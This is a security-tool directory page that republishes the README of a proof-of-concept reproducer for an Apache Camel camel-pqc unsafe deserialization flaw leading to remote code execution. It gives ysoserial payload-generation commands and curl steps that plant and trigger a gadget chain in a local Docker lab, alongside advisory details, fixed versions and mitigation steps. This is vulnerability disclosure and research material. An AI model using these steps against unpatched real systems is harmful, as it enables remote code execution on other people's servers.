Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-40048 — Reproducer for CVE-2026-40048: Apache Camel camel-pqc FileBasedKeyLifecycleManager unsafe deserialization (RCE) | Kitploit
Tools/GitHubGitHub/oscerd/cve-2026-40048
Static AnalysisVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationBinary ExploitationLabs & Practice
GitHuboscerd/cve-2026-40048

CVE-2026-40048

Reproducer for CVE-2026-40048: Apache Camel camel-pqc FileBasedKeyLifecycleManager unsafe deserialization (RCE)

102 months agoNot yet reviewed
View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

camel-pqc FileBasedKeyLifecycleManager Unsafe Deserialization Reproducer (CVE-2026-40048)

This project demonstrates a Java deserialization vulnerability in Apache Camel's camel-pqc component, tracked as CVE-2026-40048. FileBasedKeyLifecycleManager reads <keyId>.key files from the configured key directory with a raw ObjectInputStream and no ObjectInputFilter, so an attacker who can write to that directory can achieve remote code execution.

Advisory: https://camel.apache.org/security/CVE-2026-40048.html

Vulnerability Summary

PropertyValue
Componentcamel-pqc
Affected Classorg.apache.camel.component.pqc.lifecycle.FileBasedKeyLifecycleManager (getKey)
CWECWE-502: Deserialization of Untrusted Data
ImpactRemote Code Execution (RCE)
Affected VersionsFrom 4.18.0 before 4.18.2, and from 4.19.0 before 4.20.0
Fixed Versions4.18.2, 4.20.0
JIRACAMEL-23200
ReportersAndrea Cosentino (ASF), Venkatraman Kumar (Securin)

Technical Details

FileBasedKeyLifecycleManager persists post-quantum keys as serialized Java objects in <keyDir>/<keyId>.key. Loading a key deserializes that file with a raw ObjectInputStream, and the cast to KeyPair happens only after readObject() returns:

// FileBasedKeyLifecycleManager.getKey(keyId) - affected version
Path keyFile = getKeyFile(keyId);   // keyDirectory.resolve(keyId + ".key")
try (ObjectInputStream ois = new ObjectInputStream(new BufferedInputStream(Files.newInputStream(keyFile)))) {
    KeyPair keyPair = (KeyPair) ois.readObject();   // NO ObjectInputFilter — gadget runs before the cast
    ...
}

An attacker who can write to the key directory — through path traversal, misconfigured volume permissions, a compromised key-provisioning pipeline, or a symlink attack — can plant a crafted serialized object that executes during a normal key-lifecycle load.

Prerequisites

  • Java 17+ and Maven 3.8+ (to build the jar)
  • Docker (runs the reproducer)
  • ysoserial (for payload generation)

Reproduction Steps

Step 1: Build the jar and start the container

mvn clean package -DskipTests
docker compose up -d --build

Step 2: Generate a malicious payload

wget https://github.com/frohoff/ysoserial/releases/download/v0.0.6/ysoserial-all.jar

# Benign proof: create /tmp/pwned. On JDK 21 add --add-opens to generate CC gadgets:
java --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang=ALL-UNNAMED \
     --add-opens java.base/java.lang.reflect=ALL-UNNAMED \
     -jar ysoserial-all.jar CommonsCollections7 "touch /tmp/pwned" | base64 -w0 > payload.b64

Step 3: Plant the payload as <keyId>.key

curl -X POST http://localhost:8080/exploit/inject \
  -H "Content-Type: text/plain" --data-binary @payload.b64
# writes the bytes to /tmp/pqc-keys/mykey.key inside the container

Step 4: Trigger the key-lifecycle load (RCE)

curl http://localhost:8080/exploit/trigger
# getKey("mykey") -> ObjectInputStream.readObject() -> gadget executes
# -> ">>> RCE proof — /tmp/pwned exists: true"

Step 5: Verify

docker exec cve-2026-40048 ls -la /tmp/pwned

Cleanup

docker compose down

Attack Vectors

getKey() is called during normal key-lifecycle operations (signing/verification key retrieval, rotation checks, etc.), so any load of an attacker-planted <keyId>.key triggers deserialization.

Exploit Conditions

  1. Write access to the key directory used by FileBasedKeyLifecycleManager (shared/misconfigured volume, path traversal, compromised provisioning, symlink).
  2. A gadget library on the classpath (e.g. commons-collections:3.2.1).

Related follow-on CVEs

The ObjectInputStream-in-key-store pattern was addressed more broadly afterwards:

  • CVE-2026-46590 — the HashiCorp Vault + AWS Secrets Manager sibling managers (incomplete-remediation follow-on).
  • CVE-2026-43867 — an independent report of the same AWS Secrets Manager path.

Recommended Fix

Upgrade to 4.18.2 / 4.20.0. The fix replaces ObjectInputStream-based storage with standard PKCS#8 (private key) / X.509 SubjectPublicKeyInfo (public key) Base64 JSON encoding.

Mitigation

Until upgrading:

  1. Restrict write access to the key directory to the application's own identity.
  2. Remove gadget libraries (upgrade/remove commons-collections 3.x).
  3. Keep key material on a volume no less-trusted principal can write.

Files

CVE-2026-40048/
├── pom.xml
├── Dockerfile
├── docker-compose.yml
├── README.md
└── src/main/
    ├── java/com/example/
    │   ├── Application.java
    │   └── ExploitController.java   # /inject (plant .key), /trigger (getKey -> RCE), /cleanup
    └── resources/
        └── application.properties

Disclaimer

This reproducer is provided for security research and authorized testing only, for a publicly disclosed and fixed vulnerability. Do not use it against systems without explicit permission.

Download Tool